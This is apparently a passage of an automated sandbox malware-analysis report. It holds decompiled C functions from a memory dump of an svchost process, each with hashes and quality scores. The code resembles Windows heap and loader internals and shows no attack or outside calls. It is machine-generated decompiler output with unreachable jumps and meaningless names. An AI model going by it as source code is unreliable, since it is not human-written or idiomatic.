                                          						if(_t102 == 0xc0000100) {
                                          							_t83 =  *((intOrPtr*)(_t103 + 8));
                                          							__eflags = _t83;
                                          							if(_t83 != 0) {
                                          								 *((intOrPtr*)(_t103 - 0x20)) = _t83;
                                          								__eflags =  *_t83 - _t99;
                                          								if( *_t83 == _t99) {
                                          									_t102 = 0xc0000100;
                                          									goto L19;
                                          								} else {
                                          									_t91 =  *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30));
                                          									_t66 =  *((intOrPtr*)(_t91 + 0x10));
                                          									__eflags =  *((intOrPtr*)(_t66 + 0x48)) - _t83;
                                          									if( *((intOrPtr*)(_t66 + 0x48)) == _t83) {
                                          										__eflags =  *((intOrPtr*)(_t91 + 0x1c));
                                          										if( *((intOrPtr*)(_t91 + 0x1c)) == 0) {
                                          											L26:
                                          											_t102 = E03A52AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
                                          											 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
                                          											__eflags = _t102 - 0xc0000100;
                                          											if(_t102 != 0xc0000100) {
                                          												goto L12;
                                          											} else {
                                          												_t99 = 1;
                                          												_t83 =  *((intOrPtr*)(_t103 - 0x20));
                                          												goto L18;
                                          											}
                                          										} else {
                                          											_t69 = E03A36600( *((intOrPtr*)(_t91 + 0x1c)));
                                          											__eflags = _t69;
                                          											if(_t69 != 0) {
                                          												goto L26;
                                          											} else {
                                          												_t83 =  *((intOrPtr*)(_t103 + 8));
                                          												goto L18;
                                          											}
                                          										}
                                          									} else {
                                          										L18:
                                          										_t102 = E03A52C50(_t83,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)), _t99);
                                          										L19:
                                          										 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
                                          										goto L12;
                                          									}
                                          								}
                                          								L28:
                                          							} else {
                                          								E03A3EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                          								 *((intOrPtr*)(_t103 - 4)) = 1;
                                          								 *((intOrPtr*)(_t103 - 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30)) + 0x10)) + 0x48));
                                          								_t102 =  *((intOrPtr*)(_t103 + 0x1c));
                                          								_t76 = E03A52AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102);
                                          								 *((intOrPtr*)(_t103 - 0x1c)) = _t76;
                                          								__eflags = _t76 - 0xc0000100;
                                          								if(_t76 == 0xc0000100) {
                                          									 *((intOrPtr*)(_t103 - 0x1c)) = E03A52C50( *((intOrPtr*)(_t103 - 0x20)),  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102, 1);
                                          								}
                                          								 *((intOrPtr*)(_t103 - 4)) = _t99;
                                          								E03A52ACB();
                                          							}
                                          						}
                                          					}
                                          					L12:
                                          					 *((intOrPtr*)(_t103 - 4)) = 0xfffffffe;
                                          					_t62 = _t102;
                                          				}
                                          				L13:
                                          				return E03A7D0D1(_t62);
                                          				goto L28;
                                          			}

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d4ccf26456ec608f867842cfa0e01f2b118e2f473c8192717ccdc0696abeb912
                                          • Instruction ID: 0b1fd04739fcb60496d02e22e2e8048ea90102227bcc2a60df8467d2e4bce23a
                                          • Opcode Fuzzy Hash: d4ccf26456ec608f867842cfa0e01f2b118e2f473c8192717ccdc0696abeb912
                                          • Instruction Fuzzy Hash: 06514575A00209EFDF25DF55C980ADEBBB5BF48310F18845AFD15AB320C3359952CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 85%
                                          			E03A54BAD(intOrPtr __ecx, short __edx, signed char _a4, signed short _a8) {
                                          				signed int _v8;
                                          				short _v20;
                                          				intOrPtr _v24;
                                          				intOrPtr _v28;
                                          				intOrPtr _v32;
                                          				char _v36;
                                          				char _v156;
                                          				short _v158;
                                          				intOrPtr _v160;
                                          				char _v164;
                                          				intOrPtr _v168;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				signed int _t45;
                                          				intOrPtr _t74;
                                          				signed char _t77;
                                          				intOrPtr _t84;
                                          				char* _t85;
                                          				void* _t86;
                                          				intOrPtr _t87;
                                          				signed short _t88;
                                          				signed int _t89;
                                          
                                          				_t83 = __edx;
                                          				_v8 =  *0x3b1d360 ^ _t89;
                                          				_t45 = _a8 & 0x0000ffff;
                                          				_v158 = __edx;
                                          				_v168 = __ecx;
                                          				if(_t45 == 0) {
                                          					L22:
                                          					_t86 = 6;
                                          					L12:
                                          					E03A2CC50(_t86);
                                          					L11:
                                          					return E03A6B640(_t86, _t77, _v8 ^ _t89, _t83, _t84, _t86);
                                          				}
                                          				_t77 = _a4;
                                          				if((_t77 & 0x00000001) != 0) {
                                          					goto L22;
                                          				}
                                          				_t8 = _t77 + 0x34; // 0xdce0ba00
                                          				if(_t45 !=  *_t8) {
                                          					goto L22;
                                          				}
                                          				_t9 = _t77 + 0x24; // 0x3b18504
                                          				E03A42280(_t9, _t9);
                                          				_t87 = 0x78;
                                          				 *(_t77 + 0x2c) =  *( *[fs:0x18] + 0x24);
                                          				E03A6FA60( &_v156, 0, _t87);
                                          				_t13 = _t77 + 0x30; // 0x3db8
                                          				_t85 =  &_v156;
                                          				_v36 =  *_t13;
                                          				_v28 = _v168;
                                          				_v32 = 0;
                                          				_v24 = 0;
                                          				_v20 = _v158;
                                          				_v160 = 0;
                                          				while(1) {
                                          					_push( &_v164);
                                          					_push(_t87);
                                          					_push(_t85);
                                          					_push(0x18);
                                          					_push( &_v36);
                                          					_push(0x1e);
                                          					_t88 = E03A6B0B0();
                                          					if(_t88 != 0xc0000023) {
                                          						break;
                                          					}
                                          					if(_t85 !=  &_v156) {
                                          						L03A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t85);
                                          					}
                                          					_t84 = L03A44620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v164);
                                          					_v168 = _v164;
                                          					if(_t84 == 0) {
                                          						_t88 = 0xc0000017;
                                          						goto L19;
                                          					} else {
                                          						_t74 = _v160 + 1;
                                          						_v160 = _t74;
                                          						if(_t74 >= 0x10) {
                                          							L19:
                                          							_t86 = E03A2CCC0(_t88);
                                          							if(_t86 != 0) {
                                          								L8:
                                          								 *(_t77 + 0x2c) =  *(_t77 + 0x2c) & 0x00000000;
                                          								_t30 = _t77 + 0x24; // 0x3b18504
                                          								E03A3FFB0(_t77, _t84, _t30);
                                          								if(_t84 != 0 && _t84 !=  &_v156) {
                                          									L03A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t84);
                                          								}
                                          								if(_t86 != 0) {
                                          									goto L12;
                                          								} else {
                                          									goto L11;
                                          								}
                                          							}
                                          							L6:
                                          							 *(_t77 + 0x36) =  *(_t77 + 0x36) | 0x00004000;
                                          							if(_v164 != 0) {
                                          								_t83 = _t84;
                                          								E03A54F49(_t77, _t84);
                                          							}
                                          							goto L8;
                                          						}
                                          						_t87 = _v168;
                                          						continue;
                                          					}
                                          				}
                                          				if(_t88 != 0) {
                                          					goto L19;
                                          				}
                                          				goto L6;
                                          			}

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: dc9fd9a32c25ca1bbf607181b31102cf2ec62cee7665d8e371c008c0832bbdb2
                                          • Instruction ID: 4f6175e063220163ea593e5eb8ca7673e00a18838d38a94bf478b255668fb053
                                          • Opcode Fuzzy Hash: dc9fd9a32c25ca1bbf607181b31102cf2ec62cee7665d8e371c008c0832bbdb2
                                          • Instruction Fuzzy Hash: 8A418735A002289BDF21DF65CD44BEAB7B8AF49710F4504ABE908AB351D7749E84CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 78%
                                          			E03A54D3B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                          				signed int _v12;
                                          				char _v176;
                                          				char _v177;
                                          				char _v184;
                                          				intOrPtr _v192;
                                          				intOrPtr _v196;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				signed short _t42;
                                          				char* _t44;
                                          				intOrPtr _t46;
                                          				intOrPtr _t50;
                                          				char* _t57;
                                          				intOrPtr _t59;
                                          				intOrPtr _t67;
                                          				signed int _t69;
                                          
                                          				_t64 = __edx;
                                          				_v12 =  *0x3b1d360 ^ _t69;
                                          				_t65 = 0xa0;
                                          				_v196 = __edx;
                                          				_v177 = 0;
                                          				_t67 = __ecx;
                                          				_v192 = __ecx;
                                          				E03A6FA60( &_v176, 0, 0xa0);
                                          				_t57 =  &_v176;
                                          				_t59 = 0xa0;
                                          				if( *0x3b17bc8 != 0) {
                                          					L3:
                                          					while(1) {
                                          						asm("movsd");
                                          						asm("movsd");
                                          						asm("movsd");
                                          						asm("movsd");
                                          						_t67 = _v192;
                                          						 *((intOrPtr*)(_t57 + 0x10)) = _a4;
                                          						 *(_t57 + 0x24) =  *(_t57 + 0x24) & 0x00000000;
                                          						 *(_t57 + 0x14) =  *(_t67 + 0x34) & 0x0000ffff;
                                          						 *((intOrPtr*)(_t57 + 0x20)) = _v196;
                                          						_push( &_v184);
                                          						_push(_t59);
                                          						_push(_t57);
                                          						_push(0xa0);
                                          						_push(_t57);
                                          						_push(0xf);
                                          						_t42 = E03A6B0B0();
                                          						if(_t42 != 0xc0000023) {
                                          							break;
                                          						}
                                          						if(_v177 != 0) {
                                          							L03A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
                                          						}
                                          						_v177 = 1;
                                          						_t44 = L03A44620(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v184);
                                          						_t59 = _v184;
                                          						_t57 = _t44;
                                          						if(_t57 != 0) {
                                          							continue;
                                          						} else {
                                          							_t42 = 0xc0000017;
                                          							break;
                                          						}
                                          					}
                                          					if(_t42 != 0) {
                                          						_t65 = E03A2CCC0(_t42);
                                          						if(_t65 != 0) {
                                          							L10:
                                          							if(_v177 != 0) {
                                          								if(_t57 != 0) {
                                          									L03A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
                                          								}
                                          							}
                                          							_t46 = _t65;
                                          							L12:
                                          							return E03A6B640(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67);
                                          						}
                                          						L7:
                                          						_t50 = _a4;
                                          						 *((intOrPtr*)(_t67 + 0x30)) =  *((intOrPtr*)(_t57 + 0x18));
                                          						if(_t50 != 3) {
                                          							if(_t50 == 2) {
                                          								goto L8;
                                          							}
                                          							L9:
                                          							if(E03A6F380(_t67 + 0xc, 0x3a05138, 0x10) == 0) {
                                          								 *0x3b160d8 = _t67;
                                          							}
                                          							goto L10;
                                          						}
                                          						L8:
                                          						_t64 = _t57 + 0x28;
                                          						E03A54F49(_t67, _t57 + 0x28);
                                          						goto L9;
                                          					}
                                          					_t65 = 0;
                                          					goto L7;
                                          				}
                                          				if(E03A54E70(0x3b186b0, 0x3a55690, 0, 0) != 0) {
                                          					_t46 = E03A2CCC0(_t56);
                                          					goto L12;
                                          				} else {
                                          					_t59 = 0xa0;
                                          					goto L3;
                                          				}
                                          			}





















                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d12ee5ddb2445a77c9e1f62b78ae4c18d7a8fb1a3076558b391d32f9152add5b
                                          • Instruction ID: 76e7761d9572f72f480ca5a635025bb5caf973ba90c2955c8baee54d9b9b0960
                                          • Opcode Fuzzy Hash: d12ee5ddb2445a77c9e1f62b78ae4c18d7a8fb1a3076558b391d32f9152add5b
                                          • Instruction Fuzzy Hash: F041D175A40318AFEB21DF15CD84BAAB7A9EB49610F08009BFD059B380D774ED80CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 94%
                                          			E03A38A0A(intOrPtr* __ecx, signed int __edx) {
                                          				signed int _v8;
                                          				char _v524;
                                          				signed int _v528;
                                          				void* _v532;
                                          				char _v536;
                                          				char _v540;
                                          				char _v544;
                                          				intOrPtr* _v548;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				signed int _t44;
                                          				void* _t46;
                                          				void* _t48;
                                          				signed int _t53;
                                          				signed int _t55;
                                          				intOrPtr* _t62;
                                          				void* _t63;
                                          				unsigned int _t75;
                                          				signed int _t79;
                                          				unsigned int _t81;
                                          				unsigned int _t83;
                                          				signed int _t84;
                                          				void* _t87;
                                          
                                          				_t76 = __edx;
                                          				_v8 =  *0x3b1d360 ^ _t84;
                                          				_v536 = 0x200;
                                          				_t79 = 0;
                                          				_v548 = __edx;
                                          				_v544 = 0;
                                          				_t62 = __ecx;
                                          				_v540 = 0;
                                          				_v532 =  &_v524;
                                          				if(__edx == 0 || __ecx == 0) {
                                          					L6:
                                          					return E03A6B640(_t79, _t62, _v8 ^ _t84, _t76, _t79, _t81);
                                          				} else {
                                          					_v528 = 0;
                                          					E03A3E9C0(1, __ecx, 0, 0,  &_v528);
                                          					_t44 = _v528;
                                          					_t81 =  *(_t44 + 0x48) & 0x0000ffff;
                                          					_v528 =  *(_t44 + 0x4a) & 0x0000ffff;
                                          					_t46 = 0xa;
                                          					_t87 = _t81 - _t46;
                                          					if(_t87 > 0 || _t87 == 0) {
                                          						 *_v548 = 0x3a01180;
                                          						L5:
                                          						_t79 = 1;
                                          						goto L6;
                                          					} else {
                                          						_t48 = E03A51DB5(_t62,  &_v532,  &_v536);
                                          						_t76 = _v528;
                                          						if(_t48 == 0) {
                                          							L9:
                                          							E03A63C2A(_t81, _t76,  &_v544);
                                          							 *_v548 = _v544;
                                          							goto L5;
                                          						}
                                          						_t62 = _v532;
                                          						if(_t62 != 0) {
                                          							_t83 = (_t81 << 0x10) + (_t76 & 0x0000ffff);
                                          							_t53 =  *_t62;
                                          							_v528 = _t53;
                                          							if(_t53 != 0) {
                                          								_t63 = _t62 + 4;
                                          								_t55 = _v528;
                                          								do {
                                          									if( *((intOrPtr*)(_t63 + 0x10)) == 1) {
                                          										if(E03A38999(_t63,  &_v540) == 0) {
                                          											_t55 = _v528;
                                          										} else {
                                          											_t75 = (( *(_v540 + 0x14) & 0x0000ffff) << 0x10) + ( *(_v540 + 0x16) & 0x0000ffff);
                                          											_t55 = _v528;
                                          											if(_t75 >= _t83) {
                                          												_t83 = _t75;
                                          											}
                                          										}
                                          									}
                                          									_t63 = _t63 + 0x14;
                                          									_t55 = _t55 - 1;
                                          									_v528 = _t55;
                                          								} while (_t55 != 0);
                                          								_t62 = _v532;
                                          							}
                                          							if(_t62 !=  &_v524) {
                                          								L03A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t79, _t62);
                                          							}
                                          							_t76 = _t83 & 0x0000ffff;
                                          							_t81 = _t83 >> 0x10;
                                          						}
                                          						goto L9;
                                          					}
                                          				}
                                          			}




























                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 33d7e3872780172c797329fe8bc6d43d604f02ee7da6a0199de6e988778692c9
                                          • Instruction ID: bc06a0530e195945d76ee0fcecae2b64ac3eddf8f174f942be9a34c26d85fc90
                                          • Opcode Fuzzy Hash: 33d7e3872780172c797329fe8bc6d43d604f02ee7da6a0199de6e988778692c9
                                          • Instruction Fuzzy Hash: AE415FB5A0032D9BDB24DF15C888AA9B7BCEB45300F1545EBF81997351E7749E88CF60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E03AEAA16(void* __ecx, intOrPtr __edx, signed int _a4, short _a8) {
                                          				intOrPtr _v8;
                                          				char _v12;
                                          				signed int _v16;
                                          				signed char _v20;
                                          				intOrPtr _v24;
                                          				char* _t37;
                                          				void* _t47;
                                          				signed char _t51;
                                          				void* _t53;
                                          				char _t55;
                                          				intOrPtr _t57;
                                          				signed char _t61;
                                          				intOrPtr _t75;
                                          				void* _t76;
                                          				signed int _t81;
                                          				intOrPtr _t82;
                                          
                                          				_t53 = __ecx;
                                          				_t55 = 0;
                                          				_v20 = _v20 & 0;
                                          				_t75 = __edx;
                                          				_t81 = ( *(__ecx + 0xc) | _a4) & 0x93000f0b;
                                          				_v24 = __edx;
                                          				_v12 = 0;
                                          				if((_t81 & 0x01000000) != 0) {
                                          					L5:
                                          					if(_a8 != 0) {
                                          						_t81 = _t81 | 0x00000008;
                                          					}
                                          					_t57 = E03AEABF4(_t55 + _t75, _t81);
                                          					_v8 = _t57;
                                          					if(_t57 < _t75 || _t75 > 0x7fffffff) {
                                          						_t76 = 0;
                                          						_v16 = _v16 & 0;
                                          					} else {
                                          						_t59 = _t53;
                                          						_t76 = E03AEAB54(_t53, _t75, _t57, _t81 & 0x13000003,  &_v16);
                                          						if(_t76 != 0 && (_t81 & 0x30000f08) != 0) {
                                          							_t47 = E03AEAC78(_t53, _t76, _v24, _t59, _v12, _t81, _a8);
                                          							_t61 = _v20;
                                          							if(_t61 != 0) {
                                          								 *(_t47 + 2) =  *(_t47 + 2) ^ ( *(_t47 + 2) ^ _t61) & 0x0000000f;
                                          								if(E03ACCB1E(_t61, _t53, _t76, 2, _t47 + 8) < 0) {
                                          									L03A477F0(_t53, 0, _t76);
                                          									_t76 = 0;
                                          								}
                                          							}
                                          						}
                                          					}
                                          					_t82 = _v8;
                                          					L16:
                                          					if(E03A47D50() == 0) {
                                          						_t37 = 0x7ffe0380;
                                          					} else {
                                          						_t37 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                          					}
                                          					if( *_t37 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                                          						E03AE131B(_t53, _t76, _t82, _v16);
                                          					}
                                          					return _t76;
                                          				}
                                          				_t51 =  *(__ecx + 0x20);
                                          				_v20 = _t51;
                                          				if(_t51 == 0) {
                                          					goto L5;
                                          				}
                                          				_t81 = _t81 | 0x00000008;
                                          				if(E03ACCB1E(_t51, __ecx, 0, 1,  &_v12) >= 0) {
                                          					_t55 = _v12;
                                          					goto L5;
                                          				} else {
                                          					_t82 = 0;
                                          					_t76 = 0;
                                          					_v16 = _v16 & 0;
                                          					goto L16;
                                          				}
                                          			}




















                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
                                          • Instruction ID: c7573e67e4ddfb25133a142720d3486d56ec0cea4cbcb8ebb2e96e0803b74c74
                                          • Opcode Fuzzy Hash: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
                                          • Instruction Fuzzy Hash: 7531E036F10244ABDB15DBA9CD95BAFF7BBEF84210F09806FE805AB391DA749D00C650
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 76%
                                          			E03AEFDE2(signed int* __ecx, signed int __edx, signed int _a4) {
                                          				char _v8;
                                          				signed int _v12;
                                          				signed int _t29;
                                          				char* _t32;
                                          				char* _t43;
                                          				signed int _t80;
                                          				signed int* _t84;
                                          
                                          				_push(__ecx);
                                          				_push(__ecx);
                                          				_t56 = __edx;
                                          				_t84 = __ecx;
                                          				_t80 = E03AEFD4E(__ecx, __edx);
                                          				_v12 = _t80;
                                          				if(_t80 != 0) {
                                          					_t29 =  *__ecx & _t80;
                                          					_t74 = (_t80 - _t29 >> 4 << __ecx[1]) + _t29;
                                          					if(__edx <= (_t80 - _t29 >> 4 << __ecx[1]) + _t29) {
                                          						E03AF0A13(__ecx, _t80, 0, _a4);
                                          						_t80 = 1;
                                          						if(E03A47D50() == 0) {
                                          							_t32 = 0x7ffe0380;
                                          						} else {
                                          							_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                          						}
                                          						if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                                          							_push(3);
                                          							L21:
                                          							E03AE1608( *((intOrPtr*)(_t84 + 0x3c)), _t56);
                                          						}
                                          						goto L22;
                                          					}
                                          					if(( *(_t80 + 0xc) & 0x0000000c) != 8) {
                                          						_t80 = E03AF2B28(__ecx[0xc], _t74, __edx, _a4,  &_v8);
                                          						if(_t80 != 0) {
                                          							_t66 =  *((intOrPtr*)(_t84 + 0x2c));
                                          							_t77 = _v8;
                                          							if(_v8 <=  *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x2c)) + 0x28)) - 8) {
                                          								E03AEC8F7(_t66, _t77, 0);
                                          							}
                                          						}
                                          					} else {
                                          						_t80 = E03AEDBD2(__ecx[0xb], _t74, __edx, _a4);
                                          					}
                                          					if(E03A47D50() == 0) {
                                          						_t43 = 0x7ffe0380;
                                          					} else {
                                          						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                          					}
                                          					if( *_t43 == 0 || ( *( *[fs:0x30] + 0x240) & 0x00000001) == 0 || _t80 == 0) {
                                          						goto L22;
                                          					} else {
                                          						_push((0 | ( *(_v12 + 0xc) & 0x0000000c) != 0x00000008) + 2);
                                          						goto L21;
                                          					}
                                          				} else {
                                          					_push(__ecx);
                                          					_push(_t80);
                                          					E03AEA80D(__ecx[0xf], 9, __edx, _t80);
                                          					L22:
                                          					return _t80;
                                          				}
                                          			}











                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                                          • Instruction ID: 51717d3144da48bc2532a17b057d415f4d05129749f74bca36136bf9195328ae
                                          • Opcode Fuzzy Hash: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                                          • Instruction Fuzzy Hash: 1E310436300740AFD722DB68C954F6ABBAAEBC5650F1E455AE8468B382DA75EC41C720
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 70%
                                          			E03AEEA55(intOrPtr* __ecx, char __edx, signed int _a4) {
                                          				signed int _v8;
                                          				char _v12;
                                          				intOrPtr _v15;
                                          				char _v16;
                                          				intOrPtr _v19;
                                          				void* _v28;
                                          				intOrPtr _v36;
                                          				void* __ebx;
                                          				void* __edi;
                                          				signed char _t26;
                                          				signed int _t27;
                                          				char* _t40;
                                          				unsigned int* _t50;
                                          				intOrPtr* _t58;
                                          				unsigned int _t59;
                                          				char _t75;
                                          				signed int _t86;
                                          				intOrPtr _t88;
                                          				intOrPtr* _t91;
                                          
                                          				_t75 = __edx;
                                          				_t91 = __ecx;
                                          				_v12 = __edx;
                                          				_t50 = __ecx + 0x30;
                                          				_t86 = _a4 & 0x00000001;
                                          				if(_t86 == 0) {
                                          					E03A42280(_t26, _t50);
                                          					_t75 = _v16;
                                          				}
                                          				_t58 = _t91;
                                          				_t27 = E03AEE815(_t58, _t75);
                                          				_v8 = _t27;
                                          				if(_t27 != 0) {
                                          					E03A2F900(_t91 + 0x34, _t27);
                                          					if(_t86 == 0) {
                                          						E03A3FFB0(_t50, _t86, _t50);
                                          					}
                                          					_push( *((intOrPtr*)(_t91 + 4)));
                                          					_push( *_t91);
                                          					_t59 =  *(_v8 + 0x10);
                                          					_t53 = 1 << (_t59 >> 0x00000002 & 0x0000003f);
                                          					_push(0x8000);
                                          					_t11 = _t53 - 1; // 0x0
                                          					_t12 = _t53 - 1; // 0x0
                                          					_v16 = ((_t59 >> 0x00000001 & 1) + (_t59 >> 0xc) << 0xc) - 1 + (1 << (_t59 >> 0x00000002 & 0x0000003f)) - (_t11 + ((_t59 >> 0x00000001 & 1) + (_t59 >> 0x0000000c) << 0x0000000c) & _t12);
                                          					E03AEAFDE( &_v12,  &_v16);
                                          					asm("lock xadd [eax], ecx");
                                          					asm("lock xadd [eax], ecx");
                                          					E03AEBCD2(_v8,  *_t91,  *((intOrPtr*)(_t91 + 4)));
                                          					_t55 = _v36;
                                          					_t88 = _v36;
                                          					if(E03A47D50() == 0) {
                                          						_t40 = 0x7ffe0388;
                                          					} else {
                                          						_t55 = _v19;
                                          						_t40 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                          					}
                                          					if( *_t40 != 0) {
                                          						E03ADFE3F(_t55, _t91, _v15, _t55);
                                          					}
                                          				} else {
                                          					if(_t86 == 0) {
                                          						E03A3FFB0(_t50, _t86, _t50);
                                          						_t75 = _v16;
                                          					}
                                          					_push(_t58);
                                          					_t88 = 0;
                                          					_push(0);
                                          					E03AEA80D(_t91, 8, _t75, 0);
                                          				}
                                          				return _t88;
                                          			}























                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                                          • Instruction ID: 7e4391cb249e958aae9fa17259fa4bd9ad1d783a3bbfa317b2206d348514a121
                                          • Opcode Fuzzy Hash: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                                          • Instruction Fuzzy Hash: 303170766047059BC719DF24C994E6BB7A9FBC4210F048A2EF9568B744DA31E805CBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 69%
                                          			E03AA69A6(signed short* __ecx, void* __eflags) {
                                          				signed int _v8;
                                          				signed int _v16;
                                          				intOrPtr _v20;
                                          				signed int _v24;
                                          				signed short _v28;
                                          				signed int _v32;
                                          				intOrPtr _v36;
                                          				signed int _v40;
                                          				char* _v44;
                                          				signed int _v48;
                                          				intOrPtr _v52;
                                          				signed int _v56;
                                          				char _v60;
                                          				signed int _v64;
                                          				char _v68;
                                          				char _v72;
                                          				signed short* _v76;
                                          				signed int _v80;
                                          				char _v84;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				void* _t68;
                                          				intOrPtr _t73;
                                          				signed short* _t74;
                                          				void* _t77;
                                          				void* _t78;
                                          				signed int _t79;
                                          				signed int _t80;
                                          
                                          				_v8 =  *0x3b1d360 ^ _t80;
                                          				_t75 = 0x100;
                                          				_v64 = _v64 & 0x00000000;
                                          				_v76 = __ecx;
                                          				_t79 = 0;
                                          				_t68 = 0;
                                          				_v72 = 1;
                                          				_v68 =  *((intOrPtr*)( *[fs:0x18] + 0x20));
                                          				_t77 = 0;
                                          				if(L03A36C59(__ecx[2], 0x100, __eflags) != 0) {
                                          					_t79 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
                                          					if(_t79 != 0 && E03AA6BA3() != 0) {
                                          						_push(0);
                                          						_push(0);
                                          						_push(0);
                                          						_push(0x1f0003);
                                          						_push( &_v64);
                                          						if(E03A69980() >= 0) {
                                          							E03A42280(_t56, 0x3b18778);
                                          							_t77 = 1;
                                          							_t68 = 1;
                                          							if( *0x3b18774 == 0) {
                                          								asm("cdq");
                                          								 *(_t79 + 0xf70) = _v64;
                                          								 *(_t79 + 0xf74) = 0x100;
                                          								_t75 = 0;
                                          								_t73 = 4;
                                          								_v60 =  &_v68;
                                          								_v52 = _t73;
                                          								_v36 = _t73;
                                          								_t74 = _v76;
                                          								_v44 =  &_v72;
                                          								 *0x3b18774 = 1;
                                          								_v56 = 0;
                                          								_v28 = _t74[2];
                                          								_v48 = 0;
                                          								_v20 = ( *_t74 & 0x0000ffff) + 2;
                                          								_v40 = 0;
                                          								_v32 = 0;
                                          								_v24 = 0;
                                          								_v16 = 0;
                                          								if(E03A2B6F0(0x3a0c338, 0x3a0c288, 3,  &_v60) == 0) {
